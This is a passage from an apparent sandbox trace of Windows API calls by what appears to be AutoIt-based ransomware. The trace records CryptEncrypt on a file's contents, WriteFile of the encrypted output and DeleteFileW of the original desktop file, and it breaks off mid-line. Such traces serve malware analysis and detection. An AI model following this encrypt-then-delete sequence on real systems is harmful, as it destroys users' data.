[0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0135.094] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0135.094] CharLowerBuffW (in: lpsz="byte[79953]", cchLength=0xb | out: lpsz="byte[79953]") returned 0xb [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0135.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13851) returned 0x48f0048 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0135.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49038a8 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49170f8 [0135.096] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0135.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb450 [0135.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb450, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0135.096] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e538*=0x13845, dwBufLen=0x13850 | out: pbData=0x48f0048*, pdwDataLen=0x144e538*=0x13850) returned 1 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0135.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0135.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0135.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0135.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0135.097] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.097] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.097] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x13850, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x13850, lpOverlapped=0x0) returned 1 [0135.099] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0135.099] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.099] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0135.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0135.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0135.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0135.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0135.100] CryptDestroyKey (hKey=0x41ac780) returned 1 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0135.100] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.100] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.100] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0135.100] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0135.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0135.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0135.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0135.101] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0135.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0135.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.101] FreeLibrary (hLibModule=0x756e0000) returned 1 [0135.101] CloseHandle (hObject=0x2a0) returned 1 [0135.101] CloseHandle (hObject=0x258) returned 1 [0135.152] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots", lpFilePart=0x0) returned 0x2e [0135.152] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\xvnld.ots")) returned 0x20 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0135.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0135.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817bb4b0, ftCreationTime.dwHighDateTime=0x1d5e329, ftLastAccessTime.dwLowDateTime=0x1f1ffa10, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0x1f1ffa10, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x13845, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xvNld.ots", cAlternateFileName="")) returned 0x41ac6c0 [0135.152] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\xvnld.ots")) returned 1 [0135.220] FindNextFileW (in: hFindFile=0x41ac6c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817bb4b0, ftCreationTime.dwHighDateTime=0x1d5e329, ftLastAccessTime.dwLowDateTime=0x1f1ffa10, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0x1f1ffa10, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x13845, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="xvNld.ots", cAlternateFileName="")) returned 0 [0135.220] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0135.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0135.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0135.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0135.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0135.221] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0135.221] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0135.221] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0135.221] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0135.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0135.221] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0135.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0135.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0135.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391fc0 [0135.222] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391fc0 | out: hHeap=0x1780000) returned 1 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0135.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0135.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0135.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0135.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0135.223] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, 